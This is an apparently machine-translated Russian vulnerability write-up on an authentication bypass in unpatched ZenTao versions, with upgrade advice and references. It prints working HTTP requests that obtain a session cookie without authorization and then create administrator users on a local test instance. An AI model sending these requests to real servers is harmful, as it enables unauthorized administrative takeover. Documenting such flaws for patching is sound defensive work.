0x01 Введение
ZenTao разработан компанией ZenTao Software (Qingdao) Co., Ltd. и представляет собой отечественное программное обеспечение для управления проектами с открытым исходным кодом. Он объединяет управление проектами, управление продуктами, управление проектами, управление качеством, DevOps, базу знаний, эффективность BI, рабочий процесс, класс, управление обратной связью, управление организацией и управление транзакциями. Это комплексное профессиональное программное обеспечение для управления проектами исследований и разработок. Охватывает основные процессы. управления проектами НИОКР.
Эта уязвимость безопасности существует в некоторых версиях системы управления проектами ZenTao, включая версию с открытым исходным кодом, корпоративную версию и окончательную версию. Злоумышленник может воспользоваться этой уязвимостью, чтобы создать пользователя-администратора и получить права администратора серверной части. После выхода в фоновый режим его также можно комбинировать с другими уязвимостями для достижения удаленного выполнения кода.
v16.x <= Дзен Тао < v18.12 (Версия с открытым исходным кодом) v6.x <= Дзен Тао < v8.12 (Корпоративная версия) v3.x <= Дзен Тао < v4.12 (Окончательная версия)
Адрес установочного пакета Windows следующий:
https://www.zentao.net/dl/zentao/18.10/ZenTaoPMS-18.10-zbox.win64.exe
Успешно построено
Несанкционированное приобретение действительных файлов cookie
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 2
Создать пользователя-администратора
POST /zentao/api.php/v1/users HTTP/1.1
Host: 127.0.0.1:81
Cookie: zentaosid=xxxxx;
Content-Length: 90
{"account":"rootroot","password":"Qwe123","realname":"rootroot","role":"","group":"2"}
Вход успешен
Изменение группы на 1 создаст еще одно управление плагинами.
POST /zentao/api.php/v1/users HTTP/1.1
Host: 127.0.0.1:81
Cookie: zentaosid=xxxxx;
Content-Length: 86
{"account":"tttttt","password":"Qwe123","realname":"tttttt","role":"","group":"1"}
Обновить до безопасной версии https://www.zentao.net/index.html
https://www.zentao.net/book/zentaopmshelp/76.html https://x.threatbook.com/v5/article?threatInfoID=107860 https://mp.weixin.qq.com/s/FwKHmDxD7eyfiuZPNoGM6A